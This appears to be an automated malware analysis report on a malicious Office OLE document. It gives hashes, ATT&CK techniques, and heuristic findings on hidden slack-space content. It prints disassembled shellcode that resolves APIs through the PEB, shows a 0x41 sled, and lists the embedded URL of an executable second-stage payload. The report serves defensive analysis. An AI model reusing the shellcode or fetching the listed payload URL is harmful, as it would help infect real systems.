Malicious Office (OLE) / .BIN — malware analysis report

Static analysis result for SHA-256 23bccdfad0c0f125…

MALICIOUS

Office (OLE) / .BIN

Size: 2.00 MB
First seen: 2026-06-11
MD5: a2e1ff97ba3e984408e36835e2e6de70
SHA-1: eb031d33a59d2cfac9cda3fd79202d2193a53ba9
SHA-256: 23bccdfad0c0f12520e573ef4350e83cb199fb06882e623d2f6efca106dfe612
Risk Score: 102

Malware Insights

MITRE ATT&CK
T1027 Obfuscated Files or Information
T1497 Virtualization/Sandbox Evasion

The sample exhibits characteristics of a packed executable: a large unaccounted-for region of slack space and PEB access through the FS segment, both common evasion techniques. The embedded URL likely points to a secondary payload, such as an executable, which is a typical distribution method for malware.

Heuristics (4)

  • PEB access via FS segment (x86) [severity: high] SC_PEB_ACCESS
    Disassembly
    Attempted x86 opcode disassembly
    00000991  648b4030          mov eax, dword ptr fs:[eax + 0x30]
    00000995  8b400c            mov eax, dword ptr [eax + 0xc]
    00000998  8b401c            mov eax, dword ptr [eax + 0x1c]
    0000099B  8b7008            mov esi, dword ptr [eax + 8]
    0000099E  8b7820            mov edi, dword ptr [eax + 0x20]
    000009A1  8b00              mov eax, dword ptr [eax]
    000009A3  66837f1800        cmp word ptr [edi + 0x18], 0
    000009A8  75f1              jne 0x99b
    000009AA  81ec00000000      sub esp, 0
    000009B0  89e7              mov edi, esp
    000009B2  c7073274910c      mov dword ptr [edi], 0xc917432
    000009B8  c7470439e27d83    mov dword ptr [edi + 4], 0x837de239
    000009BF  c747086389d14f    mov dword ptr [edi + 8], 0x4fd18963
    000009C6  c7470c80d6af9a    mov dword ptr [edi + 0xc], 0x9aafd680
    000009CD  c7471058cb3b21    mov dword ptr [edi + 0x10], 0x213bcb58
    000009D4  6a03              push 3
    000009D6  58                pop eax
    000009D7  89fb              mov ebx, edi
    000009D9  895750            mov dword ptr [edi + 0x50], edx
    000009DC  e835ffffff        call 0x916
    000009E1  48                dec eax
    000009E2  75f8              jne 0x9dc
    000009E4  89df              mov edi, ebx
    000009E6  686c6c0000        push 0x6c6c
    000009EB  686f6e2e64        push 0x642e6e6f
    000009F0  68                .byte 0x68
  • OLE document has large unaccounted-for region [severity: high] OLE_SLACK_ANOMALY
    OLE file is 2,097,098 bytes but its declared streams total only 228 bytes; the remaining 2,096,870 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • NOP-equivalent sled detected [severity: medium] SC_NOP_EQUIV_SLED
    Long run of 0x41 bytes
    Disassembly
    Attempted x86 opcode disassembly
    0000088C  41                inc ecx
    0000088D  41                inc ecx
    0000088E  41                inc ecx
    0000088F  41                inc ecx
    00000890  41                inc ecx
    00000891  41                inc ecx
    00000892  41                inc ecx
    00000893  41                inc ecx
    00000894  41                inc ecx
    00000895  41                inc ecx
    00000896  41                inc ecx
    00000897  41                inc ecx
    00000898  41                inc ecx
    00000899  41                inc ecx
    0000089A  41                inc ecx
    0000089B  41                inc ecx
    0000089C  41                inc ecx
    0000089D  41                inc ecx
    0000089E  41                inc ecx
    0000089F  41                inc ecx
    000008A0  41                inc ecx
    000008A1  41                inc ecx
    000008A2  41                inc ecx
    000008A3  41                inc ecx
    000008A4  41                inc ecx
    000008A5  41                inc ecx
    000008A6  41                inc ecx
    000008A7  41                inc ecx
    000008A8  41                inc ecx
    000008A9  41                inc ecx
    000008AA  41                inc ecx
    000008AB  41                inc ecx
    000008AC  41                inc ecx
    000008AD  41                inc ecx
    000008AE  41                inc ecx
    000008AF  41                inc ecx
    000008B0  41                inc ecx
    000008B1  41                inc ecx
    000008B2  41                inc ecx
    000008B3  41                inc ecx
    000008B4  41                inc ecx
    000008B5  41                inc ecx
    000008B6  41                inc ecx
    000008B7  41                inc ecx
    000008B8  41                inc ecx
    000008B9  41                inc ecx
    000008BA  41                inc ecx
    000008BB  41                inc ecx
    000008BC  41                inc ecx
    000008BD  41                inc ecx
    000008BE  41                inc ecx
    000008BF  41                inc ecx
    000008C0  41                inc ecx
    000008C1  41                inc ecx
    000008C2  41                inc ecx
    000008C3  41                inc ecx
    000008C4  41                inc ecx
    000008C5  41                inc ecx
    000008C6  41                inc ecx
    000008C7  41                inc ecx
    000008C8  41                inc ecx
    000008C9  41                inc ecx
    000008CA  41                inc ecx
    000008CB  41                inc ecx
    000008CC  41                inc ecx
    000008CD  41                inc ecx
    000008CE  41                inc ecx
    000008CF  41                inc ecx
    000008D0  41                inc ecx
    000008D1  41                inc ecx
    000008D2  41                inc ecx
    000008D3  41                inc ecx
    000008D4  41                inc ecx
    000008D5  41                inc ecx
    000008D6  41                inc ecx
    000008D7  41                inc ecx
    000008D8  41                inc ecx
    000008D9  41                inc ecx
    000008DA  41                inc ecx
    000008DB  41                inc ecx
    000008DC  41                inc ecx
    000008DD  41                inc ecx
    000008DE  41                inc ecx
    000008DF  41                inc ecx
    000008E0  41                inc ecx
    000008E1  41                inc ecx
    000008E2  41                inc ecx
    000008E3  41                inc ecx
    000008E4  41                inc ecx
    000008E5  41                inc ecx
    000008E6  41                inc ecx
    000008E7  41                inc ecx
    000008E8  41                inc ecx
    000008E9  41                inc ecx
    000008EA  41                inc ecx
    000008EB  41                inc ecx
  • Embedded URL [severity: info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://a.pomf.hummingbird.moe/kampdj.exe (channel: document text, OLE body)